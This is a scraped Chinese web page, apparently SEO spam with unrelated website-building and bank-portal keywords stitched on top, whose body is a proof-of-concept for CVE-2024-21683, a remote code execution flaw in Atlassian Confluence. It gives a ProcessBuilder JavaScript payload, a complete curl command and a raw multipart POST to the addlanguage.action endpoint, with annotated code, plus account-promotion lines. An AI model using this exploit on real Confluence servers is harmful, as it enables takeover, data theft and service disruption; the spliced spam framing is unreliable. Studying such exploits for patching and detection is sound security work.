建设银行网站入口门户网站与搜索引擎的区别
2026/1/23 3:03:27 网站建设 项目流程
建设银行网站入口,门户网站与搜索引擎的区别,汕头网页制作,电影宣传类网页界面设计CVE-2024-21683#xff1a;Confluence Data Center 与 Server 远程代码执行漏洞 项目描述 CVE-2024-21683 是 Atlassian Confluence Data Center 和 Server 版本中存在的一个严重安全漏洞。该漏洞允许经过身份验证的攻击者通过特定的管理员插件功能#xff0c;上传恶意的 Jav…CVE-2024-21683Confluence Data Center 与 Server 远程代码执行漏洞项目描述CVE-2024-21683 是 Atlassian Confluence Data Center 和 Server 版本中存在的一个严重安全漏洞。该漏洞允许经过身份验证的攻击者通过特定的管理员插件功能上传恶意的 JavaScript 文件从而在服务器上执行任意系统命令。成功利用此漏洞可能导致攻击者完全控制受影响的 Confluence 服务器进而窃取数据、篡改信息或破坏服务可用性。功能特性漏洞验证提供了两种详细的漏洞利用请求方法用于验证目标 Confluence 服务器是否存在 CVE-2024-21683 漏洞。命令执行利用 Java 的ProcessBuilder类通过上传的 JavaScript 文件在目标服务器上执行任意操作系统命令示例中为启动计算器程序calc.exe。多种利用方式包含通过curl命令行工具和原始 HTTP POST 请求两种攻击向量适应不同测试环境和工具链。清晰的触发条件明确了漏洞利用成功的关键要素包括有效的管理员会话atl_token和Cookie以及对/admin/plugins/newcode/addlanguage.action端点的访问权限。安装指南此项目并非一个需要安装的软件而是一个安全漏洞的概念验证PoC和说明文档。因此没有传统的安装步骤或依赖项。使用前提一个用于测试的、受漏洞影响的 Atlassian Confluence Data Center 或 Server 环境。具备该环境的网络访问权限。拥有一个有效的、具有管理员权限的 Confluence 用户会话用于获取atl_token和Cookie。用于发送 HTTP 请求的工具如curl、Burp Suite 或 Postman。注意此 PoC 仅限用于授权的安全测试、教育研究或漏洞验证。严禁在未获得明确授权的情况下对任何系统进行测试。使用说明基础利用步骤准备恶意负载创建一个名为exploit.js的文本文件内容如下newjava.lang.ProcessBuilder[(java.lang.String[])]([calc.exe]).start()您可以将calc.exe替换为目标服务器操作系统支持的任何其他命令。获取认证令牌登录到目标 Confluence 的管理员后台从相关表单或页面中获取有效的atl_token值以及当前会话的Cookie。执行漏洞利用选择以下任一方法发送攻击请求。利用方法一使用 cURL 命令在终端中执行以下命令替换[IP_address]、[atl_token]和[Your cookies]为实际值。curl-X POST http://[IP_address]:8090/admin/plugins/newcode/addlanguage.action -HContent-Type: multipart/form-data; boundary----WebKitFormBoundaryvguW5DY0BuQ87x08-Fatl_token[atl_token]-FlanguageFileexploit.js;filenameexploit.js-FnewLanguageNameRCE--cookie[Your cookies]利用方法二发送原始 HTTP 请求使用 Burp Suite、Postman 或类似的 HTTP 客户端工具发送如下格式的 POST 请求。POST /admin/plugins/newcode/addlanguage.action HTTP/1.1 Host: 127.0.0.1:8090 Content-Length: 512 Cache-Control: max-age0 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryvguW5DY0BuQ87x08 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Cookie: [Your cookies ] Connection: close WebKitFormBoundaryvguW5DY0BuQ87x08 Content-Disposition: form-data; nameatl_token [ atl_token ] WebKitFormBoundaryvguW5DY0BuQ87x08 Content-Disposition: form-data; namelanguageFile; filenameexploit.js Content-Type: text/javascript new java.lang.ProcessBuilder[(java.lang.String[])]([calc.exe]).start() WebKitFormBoundaryvguW5DY0BuQ87x08 Content-Disposition: form-data; namenewLanguageName RCE WebKitFormBoundaryvguW5DY0BuQ87x08--验证利用结果如果目标服务器存在漏洞且利用请求成功服务器将解析并执行exploit.js文件中的 JavaScript 代码。在 Windows 服务器上这将导致calc.exe计算器进程被启动作为命令执行成功的直观证明。核心代码以下是构成此 PoC 的核心代码片段及其注释1. 恶意 JavaScript 负载 (exploit.js)// 利用Java的ProcessBuilder类执行系统命令// [calc.exe] 是要执行的命令及其参数列表此处仅为启动计算器的命令// .start() 方法启动该进程newjava.lang.ProcessBuilder[(java.lang.String[])]([calc.exe]).start()注释这是漏洞利用的核心。它利用了 Confluence 服务端对上传的 JavaScript 文件进行不安全解析或执行的特性直接调用了 Java 运行时环境来创建新的系统进程。2. cURL 攻击命令的关键部分-FlanguageFileexploit.js;filenameexploit.js注释-F参数用于向multipart/form-data类型的表单提交文件。exploit.js指定了要上传的本地文件路径filenameexploit.js设置了文件在HTTP请求中的名称。这是将恶意脚本上传到漏洞端点的关键参数。3. HTTP 请求中的 multipart 表单数据体WebKitFormBoundaryvguW5DY0BuQ87x08 Content-Disposition: form-data; namelanguageFile; filenameexploit.js Content-Type: text/javascript [恶意JS代码内容]注释这部分展示了原始 HTTP 请求中上传文件的格式。Content-Disposition头部指明了这是一个表单文件字段其名称为languageFile服务器端代码预期通过此名称接收文件。Content-Type告诉服务器文件类型为 JavaScript这可能是触发服务器端特定解析逻辑的条件之一。边界符------WebKitFormBoundary...用于分隔表单中的不同字段。更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询